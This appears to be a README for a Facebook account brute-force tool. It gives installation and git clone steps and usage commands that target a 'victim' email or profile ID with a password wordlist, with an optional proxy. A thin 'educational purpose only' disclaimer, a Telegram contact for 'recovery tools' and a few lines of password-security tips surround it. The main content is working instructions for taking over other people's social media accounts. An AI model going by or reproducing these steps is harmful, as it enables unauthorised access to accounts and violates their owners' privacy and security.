A Bruteforce attack, For educational purpose only
Message Me For Any Social Media Recovery Tool Telegram-:(https://t.me/alphahacklord)
Note : Please try not to harm anyone social media account
Just For The Purpose Of Fun And Not For Revenge
>> apt-get install git python3 python3-pip python python-pip
>> python3 -m pip install requests bs4
>> python3 -m pip install mechanize
- Kali Linux
- Parrot Os
- BlackArch Linux
- iShell
- any Os has python(2.x, 3.x) with required modules
>>apt update && apt upgrade -y
>>apt install git -y
>>git clone https://github.com/Alpha-HackLord/facebrute.git
>>cd facebrute
>>bash setup
>>python3 FBRUTE.py or FBRUTE2.py or FBRUTE3.py
- Use Strong Password(which contains standard password chars + longest as possible)
- Use 2F Authentication.
- Make location based login(+browser based).
You can use Victim email Or Facebook Profile Id:
Brute Force On Facebook Account Without any proxy:
- Command: python facebook_hack.py -t [email protected] -w passwords.txt
Brute Force On Facebook Account With Proxy:
- Command: python facebook_hack.py -t [email protected] -w passwords.txt -p 144.329.281.245:8080
- Get Target Facebook Profile ID:
- Command: python facebook_hack.py -g https://www.facebook.com/hackgod